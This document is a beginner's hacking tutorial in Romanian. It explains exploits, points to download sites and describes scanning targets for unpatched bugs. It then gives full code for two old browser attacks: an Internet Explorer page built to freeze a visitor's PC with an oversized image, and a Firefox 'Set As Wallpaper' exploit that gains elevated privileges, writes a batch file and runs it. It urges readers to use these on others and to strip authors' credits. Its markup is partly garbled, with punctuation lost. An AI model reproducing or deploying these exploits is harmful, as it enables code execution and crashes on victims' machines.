Gauri de Securitate

[misu]

Gauri de Securitate

-part 1-

EXPLOITS

Exploits sunt script-uri create de hackeri pt a avea acces la Servere deamond,linux...

Am creat acest tutorial deoarce nu multi stiu ce este un exploit si poate majoritatea nici

nu au auzit.Va voi arata in continuare pasii pt acesare un shell(script kiddley).

La un exploit se gaseste doar codul sursa.El se compileaza folosind un Compilator adecvat pt

acel cod sursa.Puteti face rost de un exploit de pe http://www.packetstormsecurity.nl ,

httpwww.securityfocus.com pt inceput compilatil

httpdownload.kappa.roaction__categoryid__46.De obicei exploits sunt pt Linux dar daca aveti

alt sistem de operare nu va faceti griji puteti sa il rulati direct din Command-Promt sau Shell

mai sunt si alte exploit care nu trebuiesc compilate cum ar fi scripturile in php si js acestea

se introduc in sursa Pagini.

Cum adunam date despre server(HTTP sau PC..)pai daca este un sever HTTP cautam un scaner pt

cgi-bin care ne arata versiunea servarului si Bug-urile nepatch-uite din server si ne ajuta la

injection ... cateva pagini folosite de admini pt loagare.Daca este un computer noramal

vom folosi un Who IS sau un scaner de porturi professional(trebuie sa ne de mai multe indici)

Recomand GFI sau SuperScan.Odata ce am aflta ce sistem are si celelalte informati cautam un

exploit pe adresele mentionate mai sus.Aveti grija incercati sa modificati databese daca vedeti

ca da eroare cand incercati sa o compilati ar trebui modificata ,dar mai intai trebuie sa va

asigurati ca codul nu contine INFORMATI sau CREDITS.Cele mai multe au erori din cauza linilor

puse de eroare diferitelor Pagin,programe,etc.

Mozilla Firefox=1.0.4 Set As Wallpaper

Va voi prezenta un exploit care mi-a placut foarte mult.El exploateaza un bug in Mozilla asfel

un java-script aflat in spatele comenzilor de Wallpaper

div style=positionrelative; width300px; height250px;

img src=javascript

asfel pacalind Browserul.Un trick care mie mi-a placut foarte mult din IE(all version) era

blocare PC si resetare acesta procedura era posibila deoarce IE nu avea o optiune anume pt poze

asa ce o afisa pe toata.Codul sursa trebuie copiat intr-o pagina HTML.el trebui introdus in

BODY.

!DOCTYPE html PUBLIC -W3CDTD XHTML 1.0 StrictEN

httpwww.w3.orgTRxhtml1DTDxhtml1-strict.dtd

html

head

title(title

meta name=keywords content=microsoft,windows,img,bug,html

head

body

p

img src=pic.png width=9999999 height=9999999 alt=puh

If you are using Microsoft Windows and are able to read this, feel lucky!br

A tip Quit your web browser immediately and pray that your unsaved documents get saved!br

iframe src=httpwww.idg.seArticlePages2005060920050609095128_MD20050609095128_MD.dbp.asp width=1024 height=768 br

p

body

html

sa revenim la Mozilla.Atentie codul sursa trebuie inserat si el tot intr-o pagina html il puteti

folosi si pe primul si pe al doilea ca sa va asigurati ca nu ati muncit degeaba in

momentul acela se reseteaza pc-ul cuiva(in caz ca fol IE)In caz ca fol alt browser inafara de

cele mentionate mai sus Toate celelate sunt copy dupa IE inafara de Opera care il recomand sa il

folositi cu toti pt ca nu am gasit nici un bug deocamdata.

eliminati Creditul.

Exploit by Michael Krax

!DOCTYPE HTML PUBLIC -W3CDTD HTML 4.01 TransitionalEN

html

head

titleFirewalling - Proof-of-Concepttitle

script

function stopload() {

in some cases the javascript url never stops to load

therefore we force a stop after the real image got loaded

window.setTimeout(window.stop(),1000);

}

script

head

body

div style=font-familyVerdana;font-size11px;

div style=font-familyVerdana;font-size15px;font-weightbold;

Firewalling - Proof-of-Conceptdiv

div style=width600px

The Set As Wallpaper dialog takes the image url as a parameter without validating it.

This allows to execute javascript in chrome and to run arbitrary code.

brbr

By using absolute positioning and the moz-opacity filter an attacker can easily fool the

user to think he is setting a valid image as wallpaper.

brbr

Right click on the image and choose Set As Wallpaper. The demo requests

UniversalXPConnect rights, creates cbooom.bat and launches the batch file

that shows a directoy listing in a dos box (Windows only).

brbr

div style=positionrelative; width300px; height250px;

img src=javascript-----------------------------eval('if(document.location.href.

substr(0,6)=='chrome'){netscape.security.Privile geManager.enablePrivilege('

UniversalXPConnect');file=Components.classes['@mozilla.orgfilelocal;1'].

createInstance(Components.interfaces.nsILocalFile) ;file.initWithPath('c

booom.bat');file.createUnique(Components.interfac es.nsIFile.NORMAL_FILE_TYPE,

420);outputStream=Components.classes['@mozilla.orgnetworkfile-output-stream;

1'].createInstance(Components.interfaces.nsIFileOutpu tStream);outputStream.init

(file,0x040x080x20,420,0);output='@ECHO OFFnBEGINnCLSnDIRnPAUSE

nEND';outputStream.write(output,output.length) ;outputStream.close();file.launch

();}else{void(0)}') width=300 height=250 alt= border=0 style=position

absolute; left0px; top0px; z-index2; -moz-opacity0;

img src=httpwww.site.comimageslogo.png width=300 height=250 alt= border=0 style=position

absolute; left0px; top0px; z-index1; onload=stopload()

div

div

body

html